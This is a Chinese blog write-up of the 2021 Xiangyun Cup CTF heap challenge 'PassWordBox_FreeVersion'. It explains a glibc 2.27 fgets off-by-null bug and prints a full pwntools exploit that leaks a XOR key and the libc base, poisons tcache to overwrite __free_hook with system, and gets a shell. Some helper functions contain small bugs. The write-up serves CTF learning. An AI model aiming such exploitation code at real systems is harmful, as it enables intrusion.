2021 祥云杯 pwn PassWordBox_FreeVersion

最新推荐文章于 2022-10-21 19:37:29 发布
最新推荐文章于 2022-10-21 19:37:29 发布
阅读量279 收藏
点赞数 2
CC 4.0 BY-SA版权
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/yongbaoii/article/details/119866320
本文探讨了在2.27版本的glibc库环境下,通过利用fgets的offbynull漏洞,作者逐步构造攻击步骤,包括添加、编辑和删除函数的运用,最终实现密码绕过加密并利用`__free_hook`执行系统调用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

保护显然是全开。
libc给的是2.27.

在这里插入图片描述

进去有个这
在这里插入图片描述
在1309这里转一下代码
在这里插入图片描述
然后p创建函数,再F5过去就明明白白了

在这里插入图片描述所以就是给4040这里排了个随机数。

add
在这里插入图片描述
fgets这里显然有一个off by one,或者直接可以说成是off by null
fgets函数很有意思,它被截断后会在后面加一个’\x00’,这个字符是算在它那个最大输入里面的。然后如果不够最大的值,回车截断。
如果够了最大值,还会把最后那个字节变成’\x00’

edit
在这里插入图片描述
编辑功能限制了使用,只能用1次,读入大小也就16个字节。

show
在这里插入图片描述show也就正正常常。

free
在这里插入图片描述
free也是都清理干净了,所以就是一个2.27下的off by null。然后只能写一次。
但是要注意它读取密码的时候是会加密的。

exp

#!usr/bin/env python
#-*- coding:utf8 -*-
from pwn import *

context.log_level = "debug"

r = process("./pwdFree")
libc = ELF("/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.27-3ubuntu1.2_amd64/libc.so.6")

def add(index,size, content): 
    r.sendlineafter("Input Your Choice:\n", "1")
    r.sendlineafter("Input The ID You Want Save:", str(index))
    r.sendlineafter("Length Of Your Pwd:", str(size))
    r.sendlineafter("Your Pwd:", content)

def add2(index,size, content): 
    r.sendlineafter("Input Your Choice:\n", "1")
    r.sendlineafter("Input The ID You Want Save:", str(index))
    r.sendlineafter("Length Of Your Pwd:", str(size))
    r.sendafter("Your Pwd:", content)

def dele(index):
    r.sendlineafter("Input Your Choice:\n", "4")
    r.sendlineafter("Idx you want 2 Delete:", str(index))

def edit(idx,content):
    r.sendlineafter("Input Your Choice:\n", "2")
    r.sendline(str(index))
    r.send(content)

def show(index):
    r.sendlineafter("Input Your Choice:\n", "3")
    r.sendlineafter("Idx you want 2 Delete:", str(index))


add('',0x20, '') #0
r.recvuntil("Save ID:")
r.recv(8)
key = u64(r.recv(8))

for i in range(7): #1-7
    add('aaaa',0xf8)

add('aaaa',0x28, "aaaa") #8
add('aaaa',0xf8, "aaaa") #9

for i in range(2):    #10-11
    add('aaaa',0x48, "aaaa")

add('aaaa',0x28, "aaaa")  #12
add('aaaa',0xf8, "aaaa")  #13
add('aaaa',0x28, "aaaa")  #14

for i in range(7):
    dele(i+1)

dele(12)
add2('aaaa',0x28,'a'*0x20+p64(0x1d0^key))

dele(9)
dele(13)

for i in range(8):  #1-7 ,9
    add('aaaa',0xf8, "aaaa")

show(10)
r.recvuntil("Pwd is: ")
libc_base = u64(r.recvuntil(8))^key  
libc_base -= 0x3ebca0 
free_hook=libc_base+libc.sym['__free_hook']
system_addr=libc_base+libc.sym['system']

add('aaaa',0x48, "aaaa") #13
dele(10)
edit(13,p64(free_hook))

add('d',0x40,p64(0x68732f6e69622f^key)) 
add('d',0x40,p64(system_addr^key))

dele(10)

r.interactive()
pwn2021 祥云 (部分)
woodwhale的博客
10-07 4608
pwn2021 祥云 (部分) 前言 国庆的最后几天,一直在补题,发现祥云那个时候一道堆题都不会,直接开始补题。 补题过程中,发现自己还是太菜了,对着师傅们的wp都有些不明白.jpg 1、note 这应该是祥云里最简单的题目了QAQ。但是之前没有学过IO,参考一位师傅写的这篇博客,pwn题堆利用的一些姿势 – IO_FILE 漏洞点在于scanf的格式化字符串,可以任意位置写。发现stack中有_IO_2_1_stdout_那么,我们写入p64(0xfbad1800) + p64(0)*3来泄露
DASCTF六月赛部分赛题复现
weixin_44145820的博客
08-13 1455
目录PWNsecreteasyheap PWN secret 这题当时比赛的时候找到了先知上的一篇文章,研究了它的代码想在本题复现,但是总是不成功 看了大佬们的博客,发现这题居然这么简单Orz 简单说一下这题的原理: 本题先close了stdout,然后给写两字节和0x18字节的机会,之后close stderr和stdin 那么我们先分析一下fclose的源码,其核心函数是位于/libio/iofclose.c的_IO_new_fclose函数,其大致流程是:首先检查文件结构体指针,之后使用_IO_
2021 祥云 pwn-PassWordBox_FreeVersion
z1r0的博客
10-16 166
overlapping之后泄露出libc,算出freehook,再利用overlapping,打fd到free hook,最后改free hook为ogg即可。漏洞点一个off by null,libc是2.27下的。但是需要注意的是内容会被加密,加密的key可以泄露出来。拿到key就是一套2.27的off by null。需要注意的是add的值不准,需要加个偏移校验一下。当内容为\x00时,show出来的就是key。打法就是2.27下的off by null。
2021 祥云PassWordBox_FreeVersion
m0_51251108的博客
10-21 616
2021 祥云PassWordBox_FreeVersion复现
2021 祥云 pwn PassWordBox_ProVersion
yongbaoii的博客
08-30 404
保护显然是全开。libc给的是2.31 看看比free的多了点啥 具体去看看。 这是菜单。 add fgets那里的问题显然已经没了,size改的比较大,看起来只能申请到large bin那样的大小。 edit 编辑确实是无限编辑。 也不会再有溢出那种东西了。 show 也有输出了。 free free也是正常清理。没有清理指针,只是清理了标志位。 多了一个叫recover的函数 可以让标志位再恢复。 那么我们就可以double free啊等等, 但是呢显然我们能申请到的chunk都很大,所以这道.
2021祥云 pwn wp
qq_39948058的博客
08-28 433
前言:题都不难,我好气,这次被大佬带飞,队里的pwn手都是神级别的,这里出了三道题,如果我不是sha,我应该能出五道,可是我好菜,这里贴出一下 note: 思路:自己构建格式化字符串漏洞,自己打,先打IO——stdout,泄露libc基地址,再打的是reallochook为onegadget,然后进行申请获取rce exp: #coding:utf-8 from pwn import * context.log_level = "debug" p = process("./note") libc =.
2021祥云 CTF pwn解 wp
qq_39948058的博客
08-26 1302
前言:题都不难,我好气,这次被大佬带飞,队里的pwn手都是神级别的,这里出了三道题,如果我不是sha,我应该能出五道,可是我好菜,这里贴出一下 note: 思路:自己构建格式化字符串漏洞,自己打,先打IO——stdout,泄露libc基地址,再打的是reallochook为onegadget,然后进行申请获取rce exp: #coding:utf-8 from pwn import * context.log_level = "debug" p = process("./note") libc =
首届祥云网络安全大赛 web wp
Firebasky的博客
11-24 982
和团队一起打了祥云,感觉还是可以的,师傅们太强了~ 自己也学习了不少继续加油~ 链接:https://pan.baidu.com/s/1WKE8UhFaKajEuaIM772aRw 提取码:93um 复制这段内容后打开百度网盘手机App,操作更方便哦 ...
[2021祥云]secrets_of_admin
cjdgg的博客
09-12 1060
[2021祥云]secrets_of_admin 这题也是直接提供了源代码 老样子,先看看有没有啥危险函数,没发现的话只能一个路由一个路由慢慢的审了 先看主路由吧 有get和post两种请求方式 get请求应该就是正常访问该页面 post请求获取了username和passwd后,判断完数据类型就把他们传递给了DB.Login() DB.Login()应该是把用来判断用户输入的用户名和密码和数据库保存的是否一致来判断登录 回到主路由的代码,如果登陆成功,他会把用户的一些信息仍token里 接下来看
glibc下各种堆溢出漏洞利用条件和方法总结
axiejundong的博客
12-30 2995
各种堆溢出漏洞总结溢出多个字节的情况一、利用条件一个chunk可以溢出,并且可以覆盖到下一个 chunk 的 size 位、fd、bk二、利用关键把 second chunk 的 size 覆盖为0,fd 改成 free@got-12, bk=shellcode 的地址(unlink 宏里面没有 check 可以这样做),然后 free first chunk。first chunk 会查找前后有没
glibc-2.29学习(上)
weixin_44145820的博客
05-28 1312
堆利用在CTF的PWN题目中一直占比较大,而最近的比赛的平台也逐渐从Ubuntu16,Ubuntu18向Ubuntu19甚至更高版本转移,为此学习一下libc-2.29中新的特性对做题还是很有帮助的 libc-2.29新变化 libc-2.29中修改了对tcache_entry的定义,通过注释我们也能看出新增加的key是为了检测double free的,如下 /* We overlay this structure on the user-data portion of a chunk when t
one_gadget 下载 安装 与使用
yongbaoii的博客
10-15 9775
00 开始 当有了ROP_gadget之后就会发现one_gadget也是必须的。 one_gadget就是用来去查找动态链接库里execve("/bin/sh", rsp+0x70, environ)函数的地址的,专职。 01 安装 sudo apt -y install ruby sudo gem install one_gadget 02 使用 举个栗子 还是挺简单的。 ...
go pwn 2022 虎符 gogogo
yongbaoii的博客
04-09 7241
刚刚看了17年seccon的baby_stack 看着这个感觉好亲切。
解决LibcSearcher找不到合适libc(更新libc)
yongbaoii的博客
02-09 6962
1 尝试直接更新 进入LibcSearcher/libc-database中运行./get文件即可进行更新。 可能./get更新不了。 2 究极更新 cd LibcSearcher rm -rf libc-database git clone https://github.com/niklasb/libc-database.git 然后进入libc-database执行./get 可能会这样提醒。 那么就看需要点啥更新点啥,一般是 ./get ubuntu #一般pwn题环境就Ubuntu,所以有第一个
linux 安装codeql环境 (二)codeql database create通过报错分析其流程
yongbaoii的博客
04-10 6175
尝试过很多解决方案之后无果 决定研究一下它的整个流程
linux 安装codeql环境 (一)基本环境搭建
yongbaoii的博客
04-10 5741
cccccccodeql
PWN 更换目标程序libc
yongbaoii的博客
12-29 5305
网上这方面我感觉还是比较少的,在这里把我的方法拿出来防止大家踩坑。 这一块知识不大懂的推荐去看《程序员的自我修养》第八章共享库那一章节。 我们换libc的原因是在调试程序的时候我们本地的libc可能跟远程计算机上的libc不一样,不是可能,基本上都不一样,那么我们程序加载libc之后里面的一些函数的偏移地址就会跟我们想的不一样,从而导致脚本不停出错。那么就需要我们去把程序所链接的libc从本地libc更换成远程服务器上的libc。 原理简单的说就是用patchelf把程序依赖libc的那个软连接改一下,或者
go runtime
yongbaoii的博客
04-01 4770
Runtime 包括go 调度 go内存分配 go GC
LibcSearcher 安装 错误处理 与使用
yongbaoii的博客
10-15 4654
00 开始 因为libc库有多个版本,不同版本里面的数据偏移不一样,在答题时往往服务器的版本与你获得的版本不一致或者直接不给你libc库,这个时候就用到了libcsearcher。 当然这种情况往往还可以参考dynelf ,这里就先不考虑了。 01 安装 git clone https://github.com/lieanu/LibcSearcher.git cd LibcSearcher python setup.py develop 02 错误处理 报错 处理方式 在root权限下安装 03 使用
pwn2_sctf_2016
最新发布
02-16
### 关于 SCTF 2016 中 pwn2 题目的解析 在 SCTF (Security Capture The Flag) 2016 的比赛中,`pwn2` 是一道涉及栈溢出漏洞利用的题目[^1]。此题允许参赛者通过特定输入来覆盖返回地址并控制程序执行流程。 #### ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值